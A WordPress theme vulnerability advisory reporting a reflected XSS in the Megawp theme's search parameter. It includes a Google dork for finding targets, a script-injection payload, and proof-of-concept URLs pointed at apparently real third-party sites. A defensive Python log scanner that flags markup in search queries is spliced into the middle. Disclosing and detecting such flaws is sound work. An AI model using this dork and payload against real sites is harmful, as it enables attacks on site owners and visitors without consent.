- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS
- # GOOGLE DORK: Megawp-Theme
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ]
- # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ]
- # SOFTWARE VERSION: <= 1
- # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme
- # CVE: N/A
### -- [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress.
[i] Vulnerable parameter(s): ?s=
### -- [ Impact: ]
[~] Code injection and the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payload: ]
[$] ?s="><script>alert(`hacked`)</script>
### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]
[!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
[!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
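A defender-side check for the `?s=` vector described above, as an added example that is not part of the original advisory: it scans web-server access logs for search requests whose decoded `s` value contains HTML markup. The log lines, IP addresses and the function name `suspicious_searches` are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Feb/2021:10:01:02 +0000] "GET /?s=wordpress+themes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2021:10:02:11 +0000] "GET /?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2021:10:03:40 +0000] "GET /?s=a+%3C+b HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Feb/2021:10:04:05 +0000] "GET /?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E HTTP/1.1" 403 512 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Feb/2021:10:04:09 +0000] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

# Client address, request target and status code from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Markup that has no place in a search term: a quote that closes an HTML
# attribute followed by '>', or the start of an opening/closing tag.
# A bare '<' followed by a space (as in "a < b") is not a tag and is ignored.
MARKUP = re.compile(r'''["']\s*>|</?[a-zA-Z]''')


def suspicious_searches(log_text, param="s"):
    """Return (client_ip, status, decoded_value) for every request whose
    search parameter decodes to HTML markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        # parse_qs percent-decodes the value, so %22%3E is compared as ">
        for value in parse_qs(urlsplit(target).query).get(param, []):
            if MARKUP.search(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in suspicious_searches(SAMPLE_LOG):
        print(f"{client} status={status} s={value!r}")
```

The status code is returned so that responses actually served by the site (200) can be separated from requests already rejected upstream (403).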
### -- [ Contacts: ]
[+] Website: ebrahim-ghiasi.ir
[+] Telegram: @hajit00n